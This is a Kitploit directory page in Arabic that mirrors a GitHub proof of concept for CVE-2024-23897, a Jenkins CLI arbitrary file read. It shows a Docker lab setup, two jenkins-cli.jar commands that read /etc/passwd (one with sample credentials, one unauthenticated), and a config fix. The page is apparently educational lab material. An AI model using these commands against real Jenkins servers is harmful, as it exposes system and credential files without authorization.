Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — في هذا git يمكنك العثور على جميع المعلومات حول CVE-2024-23897 | Kitploit
أدوات/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

في هذا git يمكنك العثور على جميع المعلومات حول CVE-2024-23897

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
42منذ 2 سنواتلم تتم المراجعة بعد

PoC-jenkins-rce_CVE-2024-23897.

في هذا المستودع، يمكنك العثور على جميع المعلومات حول CVE-2024-23897.

logo-jenkins

مقدمة

تم وصف المشكلة، التي تم تخصيص معرف CVE لها CVE-2024-23897، على أنها ثغرة قراءة ملفات عشوائية عبر واجهة سطر الأوامر المدمجة. يحتوي هذا المحلل اللغوي للأوامر على ميزة تستبدل الحرف @ المتبوع بمسار ملف في الوسيطة بمحتويات الملف (expandAtFiles). هذه الميزة مفعلة افتراضيًا، ولا تقوم Jenkins 2.441 والإصدارات الأقدم، و LTS 2.426.2 والإصدارات الأقدم بتعطيلها.

PoC

من أجل هذا الإثبات، قمت بتثبيت Jenkins 2.426.2 باستخدام Docker لاختبار استغلال الثغرة

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

بعد إنشاء مستخدم وكلمة مرور، قمت بتنزيل عميل واجهة سطر الأوامر Jenkins (jenkins-cli.jar) على جهاز المهاجم الخاص بي.

screen1

ثم كتبت الأمر لاستغلال الثغرة. في هذا الأمر، نحتاج إلى الحصول على بيانات اعتماد مستخدم Jenkins.

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
screen2

يسمح أمر آخر بعرض الأسطر الأولى من ملف دون مصادقة.

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
screen3

إصلاح الثغرة

لمواجهة هذه الثغرة، تحتاج إلى الانتقال إلى ملف تكوين Jenkins المسمى config.xml (في حالتي، يوجد في حاوية Docker الخاصة بي، لذا أقوم بالتبديل إلى وضع الصدفة في الحاوية)

screen4
وإضافة السطر:
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

وإعادة تشغيل Jenkins:

root@kitploit:~
service jenkins restart
تنزيل الأداة